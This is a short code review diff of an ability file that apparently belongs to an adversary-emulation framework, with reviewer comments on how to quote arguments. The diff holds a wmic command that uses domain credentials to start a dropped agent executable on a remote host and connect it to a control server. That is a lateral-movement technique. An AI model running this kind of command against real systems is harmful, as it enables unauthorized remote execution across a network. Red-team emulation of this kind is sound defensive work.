data/abilities/execution/ece5dde3-d370-4c20-b213-a1f424aa8d03.yml

```diff
@@ -11,7 +11,7 @@
     windows:
       psh:
         command: |
-          wmic /node:`"#{remote.host.fqdn}`" /user:#{domain.user.name} /password:#{domain.user.password} process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group} -executors psh";
+          wmic /node:`"#{remote.host.fqdn}`" /user:`"#{domain.user.name}`" /password:#{domain.user.password} process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group} -executors psh";
```

Comment:
We should probably also surround the password in quotes to be safe. I'm pretty sure the flag will ignore the surrounding quotes for the password as well.

Reply:
Sounds like a plan.